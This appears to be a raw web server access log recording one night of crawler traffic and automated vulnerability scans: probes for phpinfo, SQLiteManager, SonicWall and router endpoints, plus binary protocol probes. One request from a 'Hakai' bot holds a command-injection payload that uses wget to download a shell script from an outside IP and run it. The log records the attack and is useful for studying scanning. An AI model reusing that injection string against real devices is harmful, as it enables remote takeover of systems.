156.59.198.135 - - [03/Feb/2025:01:00:19 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109071403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.191.146 - - [03/Feb/2025:01:02:05 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [03/Feb/2025:01:04:19 +0100] "GET /docs/contadino/2018/ANGEBOT/AG18-00002.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
109.236.61.85 - - [03/Feb/2025:01:11:39 +0100] "\xff" 400 383 "-" "-"
87.120.252.207 - - [03/Feb/2025:01:39:37 +0100] "GET /index.php HTTP/1.0" 200 423 "http://triadian.castlegem.co.uk/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
156.59.198.135 - - [03/Feb/2025:01:47:23 +0100] "GET /renault.2web.at/stats/lang/awstats-al.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
172.169.1.184 - - [03/Feb/2025:01:47:39 +0100] "GET /actuator/health HTTP/1.1" 404 287 "-" "Mozilla/5.0 zgrab/0.x"
146.19.24.168 - - [03/Feb/2025:01:54:06 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [03/Feb/2025:02:09:03 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/save.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
198.235.24.73 - - [03/Feb/2025:02:12:38 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.135 - - [03/Feb/2025:02:13:03 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/undo.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:02:17:04 +0100] "GET /ed.activities.at/stats/lang/awstats-ca.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:02:21:04 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/help.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Feb/2025:02:25:05 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006221003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Feb/2025:02:29:05 +0100] "GET /renault.2web.at/stats/lang/awstats-tw.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.242.226.116 - - [03/Feb/2025:02:30:16 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0"
185.242.226.116 - - [03/Feb/2025:02:30:16 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
156.59.198.136 - - [03/Feb/2025:02:55:02 +0100] "GET /ed.activities.at/stats/lang/awstats-hu.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.148.10.242 - - [03/Feb/2025:03:05:25 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.136 - - [03/Feb/2025:03:16:47 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/pagebreak.gif HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:03:20:48 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/selectall.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Feb/2025:03:24:48 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/bold.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Feb/2025:03:28:49 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909031103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
216.218.206.68 - - [03/Feb/2025:03:30:11 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
216.218.206.68 - - [03/Feb/2025:03:34:01 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
216.218.206.68 - - [03/Feb/2025:03:34:56 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
216.218.206.68 - - [03/Feb/2025:03:35:35 +0100] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
216.218.206.68 - - [03/Feb/2025:03:35:37 +0100] "GET /phpinfo.php HTTP/1.1" 200 10249 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
216.218.206.68 - - [03/Feb/2025:03:35:40 +0100] "GET /dashboard/phpinfo.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
47.121.133.117 - - [03/Feb/2025:03:38:14 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.136 - - [03/Feb/2025:03:44:51 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/open.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:03:48:51 +0100] "GET /docs/contadino/2017/RE17-000017.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
167.94.145.101 - - [03/Feb/2025:03:49:24 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.145.101 - - [03/Feb/2025:03:49:27 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.101 - - [03/Feb/2025:03:49:27 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.101 - - [03/Feb/2025:03:49:27 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.101 - - [03/Feb/2025:03:49:28 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
139.177.202.138 - - [03/Feb/2025:03:53:23 +0100] "GET /auth1.html HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
139.177.202.138 - - [03/Feb/2025:03:53:23 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
139.177.202.138 - - [03/Feb/2025:03:53:23 +0100] "GET /auth.html HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
139.177.202.138 - - [03/Feb/2025:03:53:23 +0100] "GET /sslvpnLogin.html HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
139.177.202.138 - - [03/Feb/2025:03:53:23 +0100] "GET /api/sonicos/auth HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
139.177.202.138 - - [03/Feb/2025:03:53:23 +0100] "GET /api/sonicos/tfa HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
157.230.3.19 - - [03/Feb/2025:03:53:25 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:03:53:27 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
50.116.63.67 - - [03/Feb/2025:03:53:27 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:03:53:27 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
167.172.202.122 - - [03/Feb/2025:03:53:35 +0100] "POST /wsman HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
31.220.162.253 - - [03/Feb/2025:03:59:36 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
31.220.162.253 - - [03/Feb/2025:03:59:37 +0100] "GET /admin/ HTTP/1.1" 404 281 "http://212.69.160.11/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
31.220.162.253 - - [03/Feb/2025:03:59:37 +0100] "GET /HNAP1/ HTTP/1.1" 404 281 "http://212.69.160.11/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
31.220.162.253 - - [03/Feb/2025:03:59:37 +0100] "GET /sqlite/main.php HTTP/1.1" 404 287 "http://212.69.160.11/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
31.220.162.253 - - [03/Feb/2025:03:59:37 +0100] "GET /sqlitemanager/main.php HTTP/1.1" 404 293 "http://212.69.160.11/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
31.220.162.253 - - [03/Feb/2025:03:59:37 +0100] "GET /SQLiteManager/main.php HTTP/1.1" 404 293 "http://212.69.160.11/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
31.220.162.253 - - [03/Feb/2025:03:59:38 +0100] "GET /SQLite/main.php HTTP/1.1" 404 288 "http://212.69.160.11/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
31.220.162.253 - - [03/Feb/2025:03:59:38 +0100] "GET /SQlite/main.php HTTP/1.1" 404 288 "http://212.69.160.11/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
31.220.162.253 - - [03/Feb/2025:03:59:38 +0100] "GET /main.php HTTP/1.1" 404 283 "http://212.69.160.11/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
31.220.162.253 - - [03/Feb/2025:03:59:38 +0100] "GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1" 404 307 "http://212.69.160.11/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
31.220.162.253 - - [03/Feb/2025:03:59:39 +0100] "GET /SQLiteManager-1.2.4/main.php HTTP/1.1" 404 298 "http://212.69.160.11/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
31.220.162.253 - - [03/Feb/2025:03:59:39 +0100] "GET /agSearch/SQlite/main.php HTTP/1.1" 404 295 "http://212.69.160.11/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
167.99.147.251 - - [03/Feb/2025:04:00:43 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:43 +0100] "GET /layout.php HTTP/1.1" 200 816 "http://212.69.160.11/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:43 +0100] "GET /gui/javascript/form_form.js HTTP/1.1" 200 16206 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1903 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 200 350 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /gui/javascript/form_form.js?1738551644 HTTP/1.1" 200 16206 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /gui/javascript/jquery/jquery-tooltip/jquery.tooltip.min.js HTTP/1.1" 200 1982 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /framework/webfx/javascript/toolbar/ieemu.js HTTP/1.1" 200 2366 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /framework/webfx/javascript/toolbar/cb2.js HTTP/1.1" 200 1686 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /gui/javascript/jquery/js/jquery-1.8.2.js HTTP/1.1" 200 35391 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /framework/webfx/javascript/statusbar/statusBar.js HTTP/1.1" 200 649 "http://212.69.160.11/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /gui/images/icons/cancel.gif HTTP/1.1" 200 125 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /gui/javascript/jquery/js/jquery-ui-1.9.0.custom.min.js HTTP/1.1" 200 51286 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:44 +0100] "GET /gui/images/icons/Logo_activites_RGB.gif HTTP/1.1" 200 1336 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:45 +0100] "GET /gui/images/emptybar.gif HTTP/1.1" 200 89 "http://212.69.160.11/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:45 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2386 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:45 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 935 "http://212.69.160.11/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:45 +0100] "GET /gui/javascript/form_form.js?1738551645 HTTP/1.1" 200 16206 "http://212.69.160.11/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:46 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://212.69.160.11/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:46 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1904 "http://212.69.160.11/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
167.99.147.251 - - [03/Feb/2025:04:00:47 +0100] "GET /gui/javascript/form_form.js?1738551646 HTTP/1.1" 200 16206 "http://212.69.160.11/entry.php?id=10273&" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.6778.139 Safari/537.36"
156.59.198.136 - - [03/Feb/2025:04:04:59 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/tm_create.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:04:08:59 +0100] "GET /renault.2web.at/stats/lang/awstats-si.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
172.168.40.59 - - [03/Feb/2025:04:14:01 +0100] "GET /portal/redlion HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [03/Feb/2025:04:20:18 +0100] "GET /ed.activities.at/stats/lang/awstats-ro.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:04:24:18 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202012281403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
165.22.135.81 - - [03/Feb/2025:04:25:28 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
156.59.198.135 - - [03/Feb/2025:04:25:31 +0100] "GET /triadian/squid.jpg HTTP/1.0" 404 295 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
167.172.217.92 - - [03/Feb/2025:04:26:21 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
167.172.217.92 - - [03/Feb/2025:04:26:23 +0100] "Gh0st\xad" 400 383 "-" "-"
167.172.217.92 - - [03/Feb/2025:04:26:27 +0100] "HELP" 400 383 "-" "-"
167.172.217.92 - - [03/Feb/2025:04:26:27 +0100] "\x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc" 400 383 "-" "-"
167.172.217.92 - - [03/Feb/2025:04:26:29 +0100] "\x16\x03\x01" 400 383 "-" "-"
167.172.217.92 - - [03/Feb/2025:04:26:31 +0100] "\xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xff\xd9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff" 400 383 "-" "-"
156.59.198.136 - - [03/Feb/2025:04:28:19 +0100] "GET /ed.activities.at/stats/lang/awstats-es.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.41.181 - - [03/Feb/2025:04:29:25 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.224.128.89 - - [03/Feb/2025:04:30:11 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [03/Feb/2025:04:32:19 +0100] "GET /renault.2web.at/stats/lang/awstats-nn.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
216.218.206.67 - - [03/Feb/2025:04:32:22 +0100] "\x16\x03\x01" 400 383 "-" "-"
47.128.112.196 - - [03/Feb/2025:04:33:27 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Feb/2025:04:36:19 +0100] "GET /docs/contadino/2017/RE17-000026.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.57.34 - - [03/Feb/2025:04:37:26 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
